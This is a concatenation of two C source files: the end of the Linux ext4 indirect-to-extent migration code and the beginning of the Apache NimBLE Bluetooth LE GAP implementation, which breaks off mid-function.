struct list_blocks_struct *lb) { struct buffer_head *bh; __le32 *i_data; int i, retval = 0; ext4_lblk_t blk_count = *blk_nump; unsigned long max_entries = inode->i_sb->s_blocksize >> 2; if (!pblock) { /* Only update the file block number */ *blk_nump += max_entries * max_entries; return 0; } bh = sb_bread(inode->i_sb, pblock); if (!bh) return -EIO; i_data = (__le32 *)bh->b_data; for (i = 0; i < max_entries; i++) { if (i_data[i]) { retval = update_ind_extent_range(handle, inode, le32_to_cpu(i_data[i]), &blk_count, lb); if (retval) break; } else { /* Only update the file block number */ blk_count += max_entries; } } /* Update the file block number */ *blk_nump = blk_count; put_bh(bh); return retval; } static int update_tind_extent_range(handle_t *handle, struct inode *inode, ext4_fsblk_t pblock, ext4_lblk_t *blk_nump, struct list_blocks_struct *lb) { struct buffer_head *bh; __le32 *i_data; int i, retval = 0; ext4_lblk_t blk_count = *blk_nump; unsigned long max_entries = inode->i_sb->s_blocksize >> 2; if (!pblock) { /* Only update the file block number */ *blk_nump += max_entries * max_entries * max_entries; return 0; } bh = sb_bread(inode->i_sb, pblock); if (!bh) return -EIO; i_data = (__le32 *)bh->b_data; for (i = 0; i < max_entries; i++) { if (i_data[i]) { retval = update_dind_extent_range(handle, inode, le32_to_cpu(i_data[i]), &blk_count, lb); if (retval) break; } else /* Only update the file block number */ blk_count += max_entries * max_entries; } /* Update the file block number */ *blk_nump = blk_count; put_bh(bh); return retval; } static int extend_credit_for_blkdel(handle_t *handle, struct inode *inode) { int retval = 0, needed; if (ext4_handle_has_enough_credits(handle, EXT4_RESERVE_TRANS_BLOCKS+1)) return 0; /* * We are freeing a blocks. During this we touch * superblock, group descriptor and block bitmap. * So allocate a credit of 3. We may update * quota (user and group). 
*/ needed = 3 + EXT4_MAXQUOTAS_TRANS_BLOCKS(inode->i_sb); if (ext4_journal_extend(handle, needed) != 0) retval = ext4_journal_restart(handle, needed); return retval; } static int free_dind_blocks(handle_t *handle, struct inode *inode, __le32 i_data) { int i; __le32 *tmp_idata; struct buffer_head *bh; unsigned long max_entries = inode->i_sb->s_blocksize >> 2; bh = sb_bread(inode->i_sb, le32_to_cpu(i_data)); if (!bh) return -EIO; tmp_idata = (__le32 *)bh->b_data; for (i = 0; i < max_entries; i++) { if (tmp_idata[i]) { extend_credit_for_blkdel(handle, inode); ext4_free_blocks(handle, inode, 0, le32_to_cpu(tmp_idata[i]), 1, EXT4_FREE_BLOCKS_METADATA | EXT4_FREE_BLOCKS_FORGET); } } put_bh(bh); extend_credit_for_blkdel(handle, inode); ext4_free_blocks(handle, inode, 0, le32_to_cpu(i_data), 1, EXT4_FREE_BLOCKS_METADATA | EXT4_FREE_BLOCKS_FORGET); return 0; } static int free_tind_blocks(handle_t *handle, struct inode *inode, __le32 i_data) { int i, retval = 0; __le32 *tmp_idata; struct buffer_head *bh; unsigned long max_entries = inode->i_sb->s_blocksize >> 2; bh = sb_bread(inode->i_sb, le32_to_cpu(i_data)); if (!bh) return -EIO; tmp_idata = (__le32 *)bh->b_data; for (i = 0; i < max_entries; i++) { if (tmp_idata[i]) { retval = free_dind_blocks(handle, inode, tmp_idata[i]); if (retval) { put_bh(bh); return retval; } } } put_bh(bh); extend_credit_for_blkdel(handle, inode); ext4_free_blocks(handle, inode, 0, le32_to_cpu(i_data), 1, EXT4_FREE_BLOCKS_METADATA | EXT4_FREE_BLOCKS_FORGET); return 0; } static int free_ind_block(handle_t *handle, struct inode *inode, __le32 *i_data) { int retval; /* ei->i_data[EXT4_IND_BLOCK] */ if (i_data[0]) { extend_credit_for_blkdel(handle, inode); ext4_free_blocks(handle, inode, 0, le32_to_cpu(i_data[0]), 1, EXT4_FREE_BLOCKS_METADATA | EXT4_FREE_BLOCKS_FORGET); } /* ei->i_data[EXT4_DIND_BLOCK] */ if (i_data[1]) { retval = free_dind_blocks(handle, inode, i_data[1]); if (retval) return retval; } /* ei->i_data[EXT4_TIND_BLOCK] */ if (i_data[2]) { retval = free_tind_blocks(handle, inode, i_data[2]); if (retval) return retval; } return 0; } static int ext4_ext_swap_inode_data(handle_t *handle, struct inode *inode, struct inode *tmp_inode) { int retval; __le32 i_data[3]; struct ext4_inode_info *ei = EXT4_I(inode); struct ext4_inode_info *tmp_ei = EXT4_I(tmp_inode); /* * One credit accounted for writing the * i_data field of the original inode */ retval = ext4_journal_extend(handle, 1); if (retval) { retval = ext4_journal_restart(handle, 1); if (retval) goto err_out; } i_data[0] = ei->i_data[EXT4_IND_BLOCK]; i_data[1] = ei->i_data[EXT4_DIND_BLOCK]; i_data[2] = ei->i_data[EXT4_TIND_BLOCK]; down_write(&EXT4_I(inode)->i_data_sem); /* * if EXT4_STATE_EXT_MIGRATE is cleared a block allocation * happened after we started the migrate. We need to * fail the migrate */ if (!ext4_test_inode_state(inode, EXT4_STATE_EXT_MIGRATE)) { retval = -EAGAIN; up_write(&EXT4_I(inode)->i_data_sem); goto err_out; } else ext4_clear_inode_state(inode, EXT4_STATE_EXT_MIGRATE); /* * We have the extent map build with the tmp inode. * Now copy the i_data across */ ei->i_flags |= EXT4_EXTENTS_FL; memcpy(ei->i_data, tmp_ei->i_data, sizeof(ei->i_data)); /* * Update i_blocks with the new blocks that got * allocated while adding extents for extent index * blocks. * * While converting to extents we need not * update the orignal inode i_blocks for extent blocks * via quota APIs. The quota update happened via tmp_inode already. 
*/ spin_lock(&inode->i_lock); inode->i_blocks += tmp_inode->i_blocks; spin_unlock(&inode->i_lock); up_write(&EXT4_I(inode)->i_data_sem); /* * We mark the inode dirty after, because we decrement the * i_blocks when freeing the indirect meta-data blocks */ retval = free_ind_block(handle, inode, i_data); ext4_mark_inode_dirty(handle, inode); err_out: return retval; } static int free_ext_idx(handle_t *handle, struct inode *inode, struct ext4_extent_idx *ix) { int i, retval = 0; ext4_fsblk_t block; struct buffer_head *bh; struct ext4_extent_header *eh; block = idx_pblock(ix); bh = sb_bread(inode->i_sb, block); if (!bh) return -EIO; eh = (struct ext4_extent_header *)bh->b_data; if (eh->eh_depth != 0) { ix = EXT_FIRST_INDEX(eh); for (i = 0; i < le16_to_cpu(eh->eh_entries); i++, ix++) { retval = free_ext_idx(handle, inode, ix); if (retval) break; } } put_bh(bh); extend_credit_for_blkdel(handle, inode); ext4_free_blocks(handle, inode, 0, block, 1, EXT4_FREE_BLOCKS_METADATA | EXT4_FREE_BLOCKS_FORGET); return retval; } /* * Free the extent meta data blocks only */ static int free_ext_block(handle_t *handle, struct inode *inode) { int i, retval = 0; struct ext4_inode_info *ei = EXT4_I(inode); struct ext4_extent_header *eh = (struct ext4_extent_header *)ei->i_data; struct ext4_extent_idx *ix; if (eh->eh_depth == 0) /* * No extra blocks allocated for extent meta data */ return 0; ix = EXT_FIRST_INDEX(eh); for (i = 0; i < le16_to_cpu(eh->eh_entries); i++, ix++) { retval = free_ext_idx(handle, inode, ix); if (retval) return retval; } return retval; } int ext4_ext_migrate(struct inode *inode) { handle_t *handle; int retval = 0, i; __le32 *i_data; ext4_lblk_t blk_count = 0; struct ext4_inode_info *ei; struct inode *tmp_inode = NULL; struct list_blocks_struct lb; unsigned long max_entries; __u32 goal; /* * If the filesystem does not support extents, or the inode * already is extent-based, error out. */ if (!EXT4_HAS_INCOMPAT_FEATURE(inode->i_sb, EXT4_FEATURE_INCOMPAT_EXTENTS) || (EXT4_I(inode)->i_flags & EXT4_EXTENTS_FL)) return -EINVAL; if (S_ISLNK(inode->i_mode) && inode->i_blocks == 0) /* * don't migrate fast symlinks */ return retval; handle = ext4_journal_start(inode, EXT4_DATA_TRANS_BLOCKS(inode->i_sb) + EXT4_INDEX_EXTRA_TRANS_BLOCKS + 3 + EXT4_MAXQUOTAS_INIT_BLOCKS(inode->i_sb) + 1); if (IS_ERR(handle)) { retval = PTR_ERR(handle); return retval; } goal = (((inode->i_ino - 1) / EXT4_INODES_PER_GROUP(inode->i_sb)) * EXT4_INODES_PER_GROUP(inode->i_sb)) + 1; tmp_inode = ext4_new_inode(handle, inode->i_sb->s_root->d_inode, S_IFREG, 0, goal); if (IS_ERR(tmp_inode)) { retval = -ENOMEM; ext4_journal_stop(handle); return retval; } i_size_write(tmp_inode, i_size_read(inode)); /* * Set the i_nlink to zero so it will be deleted later * when we drop the inode reference. */ tmp_inode->i_nlink = 0; ext4_ext_tree_init(handle, tmp_inode); ext4_orphan_add(handle, tmp_inode); ext4_journal_stop(handle); /* * start with one credit accounted for * superblock modification. * * For the tmp_inode we already have committed the * transaction that created the inode. Later, as and * when we add extents, we extend the journal */ /* * Even though we take i_mutex we can still cause block * allocation via mmap write to holes. If we have allocated * new blocks we fail migrate. New block allocation will * clear EXT4_STATE_EXT_MIGRATE flag. The flag is updated * with i_data_sem held to prevent racing with block * allocation.
*/ down_read((&EXT4_I(inode)->i_data_sem)); ext4_set_inode_state(inode, EXT4_STATE_EXT_MIGRATE); up_read((&EXT4_I(inode)->i_data_sem)); handle = ext4_journal_start(inode, 1); if (IS_ERR(handle)) { /* * It is impossible to update on-disk structures without * a handle, so just roll back in-core changes and leave the * remaining work to orphan_list_cleanup() */ ext4_orphan_del(NULL, tmp_inode); retval = PTR_ERR(handle); goto out; } ei = EXT4_I(inode); i_data = ei->i_data; memset(&lb, 0, sizeof(lb)); /* 32 bit block address, 4 bytes */ max_entries = inode->i_sb->s_blocksize >> 2; for (i = 0; i < EXT4_NDIR_BLOCKS; i++, blk_count++) { if (i_data[i]) { retval = update_extent_range(handle, tmp_inode, le32_to_cpu(i_data[i]), blk_count, &lb); if (retval) goto err_out; } } if (i_data[EXT4_IND_BLOCK]) { retval = update_ind_extent_range(handle, tmp_inode, le32_to_cpu(i_data[EXT4_IND_BLOCK]), &blk_count, &lb); if (retval) goto err_out; } else blk_count += max_entries; if (i_data[EXT4_DIND_BLOCK]) { retval = update_dind_extent_range(handle, tmp_inode, le32_to_cpu(i_data[EXT4_DIND_BLOCK]), &blk_count, &lb); if (retval) goto err_out; } else blk_count += max_entries * max_entries; if (i_data[EXT4_TIND_BLOCK]) { retval = update_tind_extent_range(handle, tmp_inode, le32_to_cpu(i_data[EXT4_TIND_BLOCK]), &blk_count, &lb); if (retval) goto err_out; } /* * Build the last extent */ retval = finish_range(handle, tmp_inode, &lb); err_out: if (retval) /* * Failure case: delete the extent information built in the * tmp_inode */ free_ext_block(handle, tmp_inode); else { retval = ext4_ext_swap_inode_data(handle, inode, tmp_inode); if (retval) /* * If we fail to swap the inode data, free the extent * details of the tmp inode */ free_ext_block(handle, tmp_inode); } /* We mark the tmp_inode dirty via ext4_ext_tree_init. */ if (ext4_journal_extend(handle, 1) != 0) ext4_journal_restart(handle, 1); /* * Mark the tmp_inode as of size zero */ i_size_write(tmp_inode, 0); /* * set the i_blocks count to zero * so that ext4_delete_inode does the * right job * * We don't need to take the i_lock because * the inode is not visible to user space. */ tmp_inode->i_blocks = 0; /* Reset the extent details */ ext4_ext_tree_init(handle, tmp_inode); ext4_journal_stop(handle); out: unlock_new_inode(tmp_inode); iput(tmp_inode); return retval; }
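/*
 * Illustrative sketch, not part of the original file: how a caller such as
 * the EXT4_IOC_MIGRATE ioctl path might drive ext4_ext_migrate(). The
 * wrapper name example_ioc_migrate is hypothetical, and locking is
 * simplified to the inode mutex of this kernel era.
 */
static long example_ioc_migrate(struct file *filp)
{
	struct inode *inode = filp->f_path.dentry->d_inode;
	long err;

	/*
	 * Serialize with other writers; ext4_ext_migrate() additionally
	 * guards the block map with i_data_sem and the
	 * EXT4_STATE_EXT_MIGRATE flag, as seen above.
	 */
	mutex_lock(&inode->i_mutex);
	err = ext4_ext_migrate(inode);
	mutex_unlock(&inode->i_mutex);

	return err;
}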
465873.c
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ #include <assert.h> #include <string.h> #include <errno.h> #include "nimble/nimble_opt.h" #include "host/ble_hs_adv.h" #include "host/ble_hs_hci.h" #include "ble_hs_priv.h" #if MYNEWT #include "bsp/bsp.h" #else #define bssnz_t #endif /** * GAP - Generic Access Profile. * * Design overview: * * GAP procedures are initiated by the application via function calls. Such * functions return when either of the following happens: * * (1) The procedure completes (success or failure). * (2) The procedure cannot proceed until a BLE peer responds. * * For (1), the result of the procedure is fully indicated by the function * return code. * For (2), the procedure result is indicated by an application-configured * callback. The callback is executed when the procedure completes. * * The GAP is always in one of two states: * 1. Free * 2. Preempted * * While GAP is in the free state, new procedures can be started at will. * While GAP is in the preempted state, no new procedures are allowed. The * host sets GAP to the preempted state when it needs to ensure no ongoing * procedures, a condition required for some HCI commands to succeed. The host * must take care to take GAP out of the preempted state as soon as possible. * * Notes on thread-safety: * 1. The ble_hs mutex must always be unlocked when an application callback is * executed. The purpose of this requirement is to allow callbacks to * initiate additional host procedures, which may require locking of the * mutex. * 2. Functions called directly by the application never call callbacks. * Generally, these functions lock the ble_hs mutex at the start, and only * unlock it at return. * 3. Functions which do call callbacks (receive handlers and timer * expirations) generally only lock the mutex long enough to modify * affected state and make copies of data needed for the callback. A copy * of various pieces of data is called a "snapshot" (struct * ble_gap_snapshot). The sole purpose of snapshots is to allow callbacks * to be executed after unlocking the mutex. */ /** GAP procedure op codes. */ #define BLE_GAP_OP_NULL 0 #define BLE_GAP_OP_M_DISC 1 #define BLE_GAP_OP_M_CONN 2 #define BLE_GAP_OP_S_ADV 1 #define BLE_GAP_OP_S_PERIODIC_ADV 2 #define BLE_GAP_OP_SYNC 1 /** * If an attempt to cancel an active procedure fails, the attempt is retried * at this rate (ms).
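 * (ble_gap_master_timer() below returns this interval, converted to ticks,
 * whenever an HCI cancel command fails.)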
*/ #define BLE_GAP_CANCEL_RETRY_TIMEOUT_MS 100 /* ms */ #define BLE_GAP_UPDATE_TIMEOUT_MS 40000 /* ms */ #if MYNEWT_VAL(BLE_ROLE_CENTRAL) static const struct ble_gap_conn_params ble_gap_conn_params_dflt = { .scan_itvl = 0x0010, .scan_window = 0x0010, .itvl_min = BLE_GAP_INITIAL_CONN_ITVL_MIN, .itvl_max = BLE_GAP_INITIAL_CONN_ITVL_MAX, .latency = BLE_GAP_INITIAL_CONN_LATENCY, .supervision_timeout = BLE_GAP_INITIAL_SUPERVISION_TIMEOUT, .min_ce_len = BLE_GAP_INITIAL_CONN_MIN_CE_LEN, .max_ce_len = BLE_GAP_INITIAL_CONN_MAX_CE_LEN, }; #endif /** * The state of the in-progress master connection. If no master connection is * currently in progress, then the op field is set to BLE_GAP_OP_NULL. */ struct ble_gap_master_state { uint8_t op; uint8_t exp_set:1; ble_npl_time_t exp_os_ticks; ble_gap_event_fn *cb; void *cb_arg; /** * Indicates the type of master procedure that was preempted, or * BLE_GAP_OP_NULL if no procedure was preempted. */ uint8_t preempted_op; union { struct { uint8_t using_wl:1; uint8_t our_addr_type:2; uint8_t cancel:1; } conn; struct { uint8_t limited:1; } disc; }; }; static bssnz_t struct ble_gap_master_state ble_gap_master; #if MYNEWT_VAL(BLE_PERIODIC_ADV) /** * The state of the in-progress sync creation. If no sync creation connection is * currently in progress, then the op field is set to BLE_GAP_OP_NULL. */ struct ble_gap_sync_state { uint8_t op; struct ble_hs_periodic_sync *psync; ble_gap_event_fn *cb; void *cb_arg; }; static bssnz_t struct ble_gap_sync_state ble_gap_sync; #endif /** * The state of the in-progress slave connection. If no slave connection is * currently in progress, then the op field is set to BLE_GAP_OP_NULL. */ struct ble_gap_slave_state { uint8_t op; unsigned int our_addr_type:2; unsigned int preempted:1; /** Set to 1 if advertising was preempted. 
*/ unsigned int connectable:1; #if MYNEWT_VAL(BLE_EXT_ADV) unsigned int configured:1; /** If instance is configured */ unsigned int scannable:1; unsigned int directed:1; unsigned int high_duty_directed:1; unsigned int legacy_pdu:1; unsigned int rnd_addr_set:1; #if MYNEWT_VAL(BLE_PERIODIC_ADV) unsigned int periodic_configured:1; uint8_t periodic_op; #endif uint8_t rnd_addr[6]; #else /* timer is used only with legacy advertising */ unsigned int exp_set:1; ble_npl_time_t exp_os_ticks; #endif ble_gap_event_fn *cb; void *cb_arg; }; static bssnz_t struct ble_gap_slave_state ble_gap_slave[BLE_ADV_INSTANCES]; struct ble_gap_update_entry { SLIST_ENTRY(ble_gap_update_entry) next; struct ble_gap_upd_params params; ble_npl_time_t exp_os_ticks; uint16_t conn_handle; }; SLIST_HEAD(ble_gap_update_entry_list, ble_gap_update_entry); struct ble_gap_snapshot { struct ble_gap_conn_desc *desc; ble_gap_event_fn *cb; void *cb_arg; }; static SLIST_HEAD(ble_gap_hook_list, ble_gap_event_listener) ble_gap_event_listener_list; static os_membuf_t ble_gap_update_entry_mem[ OS_MEMPOOL_SIZE(MYNEWT_VAL(BLE_GAP_MAX_PENDING_CONN_PARAM_UPDATE), sizeof (struct ble_gap_update_entry))]; static struct os_mempool ble_gap_update_entry_pool; static struct ble_gap_update_entry_list ble_gap_update_entries; static void ble_gap_update_entry_free(struct ble_gap_update_entry *entry); #if NIMBLE_BLE_CONNECT static struct ble_gap_update_entry * ble_gap_update_entry_find(uint16_t conn_handle, struct ble_gap_update_entry **out_prev); static void ble_gap_update_l2cap_cb(uint16_t conn_handle, int status, void *arg); #endif static struct ble_gap_update_entry * ble_gap_update_entry_remove(uint16_t conn_handle); #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) static int ble_gap_adv_enable_tx(int enable); #endif static int ble_gap_conn_cancel_tx(void); #if NIMBLE_BLE_SCAN && !MYNEWT_VAL(BLE_EXT_ADV) static int ble_gap_disc_enable_tx(int enable, int filter_duplicates); #endif STATS_SECT_DECL(ble_gap_stats) ble_gap_stats; STATS_NAME_START(ble_gap_stats) STATS_NAME(ble_gap_stats, wl_set) STATS_NAME(ble_gap_stats, wl_set_fail) STATS_NAME(ble_gap_stats, adv_stop) STATS_NAME(ble_gap_stats, adv_stop_fail) STATS_NAME(ble_gap_stats, adv_start) STATS_NAME(ble_gap_stats, adv_start_fail) STATS_NAME(ble_gap_stats, adv_set_data) STATS_NAME(ble_gap_stats, adv_set_data_fail) STATS_NAME(ble_gap_stats, adv_rsp_set_data) STATS_NAME(ble_gap_stats, adv_rsp_set_data_fail) STATS_NAME(ble_gap_stats, discover) STATS_NAME(ble_gap_stats, discover_fail) STATS_NAME(ble_gap_stats, initiate) STATS_NAME(ble_gap_stats, initiate_fail) STATS_NAME(ble_gap_stats, terminate) STATS_NAME(ble_gap_stats, terminate_fail) STATS_NAME(ble_gap_stats, cancel) STATS_NAME(ble_gap_stats, cancel_fail) STATS_NAME(ble_gap_stats, update) STATS_NAME(ble_gap_stats, update_fail) STATS_NAME(ble_gap_stats, connect_mst) STATS_NAME(ble_gap_stats, connect_slv) STATS_NAME(ble_gap_stats, disconnect) STATS_NAME(ble_gap_stats, rx_disconnect) STATS_NAME(ble_gap_stats, rx_update_complete) STATS_NAME(ble_gap_stats, rx_adv_report) STATS_NAME(ble_gap_stats, rx_conn_complete) STATS_NAME(ble_gap_stats, discover_cancel) STATS_NAME(ble_gap_stats, discover_cancel_fail) STATS_NAME(ble_gap_stats, security_initiate) STATS_NAME(ble_gap_stats, security_initiate_fail) STATS_NAME_END(ble_gap_stats) /***************************************************************************** * $debug * *****************************************************************************/ #if MYNEWT_VAL(BLE_HS_DEBUG) int 
ble_gap_dbg_update_active(uint16_t conn_handle) { const struct ble_gap_update_entry *entry; ble_hs_lock(); entry = ble_gap_update_entry_find(conn_handle, NULL); ble_hs_unlock(); return entry != NULL; } #endif /***************************************************************************** * $log * *****************************************************************************/ #if NIMBLE_BLE_SCAN && !MYNEWT_VAL(BLE_EXT_ADV) static void ble_gap_log_duration(int32_t duration_ms) { if (duration_ms == BLE_HS_FOREVER) { BLE_HS_LOG(INFO, "duration=forever"); } else { BLE_HS_LOG(INFO, "duration=%dms", duration_ms); } } #endif #if MYNEWT_VAL(BLE_ROLE_CENTRAL) && !MYNEWT_VAL(BLE_EXT_ADV) static void ble_gap_log_conn(uint8_t own_addr_type, const ble_addr_t *peer_addr, const struct ble_gap_conn_params *params) { if (peer_addr != NULL) { BLE_HS_LOG(INFO, "peer_addr_type=%d peer_addr=", peer_addr->type); BLE_HS_LOG_ADDR(INFO, peer_addr->val); } BLE_HS_LOG(INFO, " scan_itvl=%d scan_window=%d itvl_min=%d itvl_max=%d " "latency=%d supervision_timeout=%d min_ce_len=%d " "max_ce_len=%d own_addr_type=%d", params->scan_itvl, params->scan_window, params->itvl_min, params->itvl_max, params->latency, params->supervision_timeout, params->min_ce_len, params->max_ce_len, own_addr_type); } #endif #if NIMBLE_BLE_SCAN && !MYNEWT_VAL(BLE_EXT_ADV) static void ble_gap_log_disc(uint8_t own_addr_type, int32_t duration_ms, const struct ble_gap_disc_params *disc_params) { BLE_HS_LOG(INFO, "own_addr_type=%d filter_policy=%d passive=%d limited=%d " "filter_duplicates=%d ", own_addr_type, disc_params->filter_policy, disc_params->passive, disc_params->limited, disc_params->filter_duplicates); ble_gap_log_duration(duration_ms); } #endif #if NIMBLE_BLE_CONNECT static void ble_gap_log_update(uint16_t conn_handle, const struct ble_gap_upd_params *params) { BLE_HS_LOG(INFO, "connection parameter update; " "conn_handle=%d itvl_min=%d itvl_max=%d latency=%d " "supervision_timeout=%d min_ce_len=%d max_ce_len=%d", conn_handle, params->itvl_min, params->itvl_max, params->latency, params->supervision_timeout, params->min_ce_len, params->max_ce_len); } #endif #if MYNEWT_VAL(BLE_WHITELIST) static void ble_gap_log_wl(const ble_addr_t *addr, uint8_t white_list_count) { int i; BLE_HS_LOG(INFO, "count=%d ", white_list_count); for (i = 0; i < white_list_count; i++, addr++) { BLE_HS_LOG(INFO, "entry-%d={addr_type=%d addr=", i, addr->type); BLE_HS_LOG_ADDR(INFO, addr->val); BLE_HS_LOG(INFO, "} "); } } #endif #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) static void ble_gap_log_adv(uint8_t own_addr_type, const ble_addr_t *direct_addr, const struct ble_gap_adv_params *adv_params) { BLE_HS_LOG(INFO, "disc_mode=%d", adv_params->disc_mode); if (direct_addr) { BLE_HS_LOG(INFO, " direct_addr_type=%d direct_addr=", direct_addr->type); BLE_HS_LOG_ADDR(INFO, direct_addr->val); } BLE_HS_LOG(INFO, " adv_channel_map=%d own_addr_type=%d " "adv_filter_policy=%d adv_itvl_min=%d adv_itvl_max=%d", adv_params->channel_map, own_addr_type, adv_params->filter_policy, adv_params->itvl_min, adv_params->itvl_max); } #endif /***************************************************************************** * $snapshot * *****************************************************************************/ static void ble_gap_fill_conn_desc(struct ble_hs_conn *conn, struct ble_gap_conn_desc *desc) { struct ble_hs_conn_addrs addrs; ble_hs_conn_addrs(conn, &addrs); desc->our_id_addr = addrs.our_id_addr; desc->peer_id_addr = addrs.peer_id_addr; desc->our_ota_addr = addrs.our_ota_addr; 
desc->peer_ota_addr = addrs.peer_ota_addr; desc->conn_handle = conn->bhc_handle; desc->conn_itvl = conn->bhc_itvl; desc->conn_latency = conn->bhc_latency; desc->supervision_timeout = conn->bhc_supervision_timeout; desc->master_clock_accuracy = conn->bhc_master_clock_accuracy; desc->sec_state = conn->bhc_sec_state; if (conn->bhc_flags & BLE_HS_CONN_F_MASTER) { desc->role = BLE_GAP_ROLE_MASTER; } else { desc->role = BLE_GAP_ROLE_SLAVE; } } static void ble_gap_conn_to_snapshot(struct ble_hs_conn *conn, struct ble_gap_snapshot *snap) { ble_gap_fill_conn_desc(conn, snap->desc); snap->cb = conn->bhc_cb; snap->cb_arg = conn->bhc_cb_arg; } static int ble_gap_find_snapshot(uint16_t handle, struct ble_gap_snapshot *snap) { struct ble_hs_conn *conn; ble_hs_lock(); conn = ble_hs_conn_find(handle); if (conn != NULL) { ble_gap_conn_to_snapshot(conn, snap); } ble_hs_unlock(); if (conn == NULL) { return BLE_HS_ENOTCONN; } else { return 0; } } int ble_gap_conn_find(uint16_t handle, struct ble_gap_conn_desc *out_desc) { struct ble_hs_conn *conn; ble_hs_lock(); conn = ble_hs_conn_find(handle); if (conn != NULL && out_desc != NULL) { ble_gap_fill_conn_desc(conn, out_desc); } ble_hs_unlock(); if (conn == NULL) { return BLE_HS_ENOTCONN; } else { return 0; } } int ble_gap_conn_find_by_addr(const ble_addr_t *addr, struct ble_gap_conn_desc *out_desc) { struct ble_hs_conn *conn; ble_hs_lock(); conn = ble_hs_conn_find_by_addr(addr); if (conn != NULL && out_desc != NULL) { ble_gap_fill_conn_desc(conn, out_desc); } ble_hs_unlock(); if (conn == NULL) { return BLE_HS_ENOTCONN; } return 0; } static int ble_gap_extract_conn_cb(uint16_t conn_handle, ble_gap_event_fn **out_cb, void **out_cb_arg) { const struct ble_hs_conn *conn; BLE_HS_DBG_ASSERT(conn_handle <= BLE_HCI_LE_CONN_HANDLE_MAX); ble_hs_lock(); conn = ble_hs_conn_find(conn_handle); if (conn != NULL) { *out_cb = conn->bhc_cb; *out_cb_arg = conn->bhc_cb_arg; } else { *out_cb = NULL; *out_cb_arg = NULL; } ble_hs_unlock(); if (conn == NULL) { return BLE_HS_ENOTCONN; } else { return 0; } } int ble_gap_set_priv_mode(const ble_addr_t *peer_addr, uint8_t priv_mode) { return ble_hs_pvcy_set_mode(peer_addr, priv_mode); } int ble_gap_read_le_phy(uint16_t conn_handle, uint8_t *tx_phy, uint8_t *rx_phy) { struct ble_hci_le_rd_phy_cp cmd; struct ble_hci_le_rd_phy_rp rsp; struct ble_hs_conn *conn; int rc; ble_hs_lock(); conn = ble_hs_conn_find(conn_handle); ble_hs_unlock(); if (conn == NULL) { return BLE_HS_ENOTCONN; } cmd.conn_handle = htole16(conn_handle); rc = ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_RD_PHY), &cmd, sizeof(cmd), &rsp, sizeof(rsp)); if (rc != 0) { return rc; } /* sanity check for response */ if (le16toh(rsp.conn_handle) != conn_handle) { return BLE_HS_ECONTROLLER; } *tx_phy = rsp.tx_phy; *rx_phy = rsp.rx_phy; return 0; } int ble_gap_set_prefered_default_le_phy(uint8_t tx_phys_mask, uint8_t rx_phys_mask) { struct ble_hci_le_set_default_phy_cp cmd; if (tx_phys_mask > (BLE_HCI_LE_PHY_1M_PREF_MASK | BLE_HCI_LE_PHY_2M_PREF_MASK | BLE_HCI_LE_PHY_CODED_PREF_MASK)) { return BLE_ERR_INV_HCI_CMD_PARMS; } if (rx_phys_mask > (BLE_HCI_LE_PHY_1M_PREF_MASK | BLE_HCI_LE_PHY_2M_PREF_MASK | BLE_HCI_LE_PHY_CODED_PREF_MASK)) { return BLE_ERR_INV_HCI_CMD_PARMS; } memset(&cmd, 0, sizeof(cmd)); if (tx_phys_mask == 0) { cmd.all_phys |= BLE_HCI_LE_PHY_NO_TX_PREF_MASK; } else { cmd.tx_phys = tx_phys_mask; } if (rx_phys_mask == 0) { cmd.all_phys |= BLE_HCI_LE_PHY_NO_RX_PREF_MASK; } else { cmd.rx_phys = rx_phys_mask; } return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, 
BLE_HCI_OCF_LE_SET_DEFAULT_PHY), &cmd, sizeof(cmd), NULL, 0); } int ble_gap_set_prefered_le_phy(uint16_t conn_handle, uint8_t tx_phys_mask, uint8_t rx_phys_mask, uint16_t phy_opts) { struct ble_hci_le_set_phy_cp cmd; struct ble_hs_conn *conn; ble_hs_lock(); conn = ble_hs_conn_find(conn_handle); ble_hs_unlock(); if (conn == NULL) { return BLE_HS_ENOTCONN; } if (tx_phys_mask > (BLE_HCI_LE_PHY_1M_PREF_MASK | BLE_HCI_LE_PHY_2M_PREF_MASK | BLE_HCI_LE_PHY_CODED_PREF_MASK)) { return BLE_ERR_INV_HCI_CMD_PARMS; } if (rx_phys_mask > (BLE_HCI_LE_PHY_1M_PREF_MASK | BLE_HCI_LE_PHY_2M_PREF_MASK | BLE_HCI_LE_PHY_CODED_PREF_MASK)) { return BLE_ERR_INV_HCI_CMD_PARMS; } if (phy_opts > BLE_HCI_LE_PHY_CODED_S8_PREF) { return BLE_ERR_INV_HCI_CMD_PARMS; } memset(&cmd, 0, sizeof(cmd)); cmd.conn_handle = htole16(conn_handle); if (tx_phys_mask == 0) { cmd.all_phys |= BLE_HCI_LE_PHY_NO_TX_PREF_MASK; } else { cmd.tx_phys = tx_phys_mask; } if (rx_phys_mask == 0) { cmd.all_phys |= BLE_HCI_LE_PHY_NO_RX_PREF_MASK; } else { cmd.rx_phys = rx_phys_mask; } cmd.phy_options = htole16(phy_opts); return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_PHY), &cmd, sizeof(cmd), NULL, 0); } /***************************************************************************** * $misc * *****************************************************************************/ static int ble_gap_event_listener_call(struct ble_gap_event *event); static int ble_gap_call_event_cb(struct ble_gap_event *event, ble_gap_event_fn *cb, void *cb_arg) { int rc; BLE_HS_DBG_ASSERT(!ble_hs_locked_by_cur_task()); if (cb != NULL) { rc = cb(event, cb_arg); } else { if (event->type == BLE_GAP_EVENT_CONN_UPDATE_REQ) { /* Just copy peer parameters back into the reply. */ *event->conn_update_req.self_params = *event->conn_update_req.peer_params; } rc = 0; } return rc; } static int ble_gap_call_conn_event_cb(struct ble_gap_event *event, uint16_t conn_handle) { ble_gap_event_fn *cb; void *cb_arg; int rc; rc = 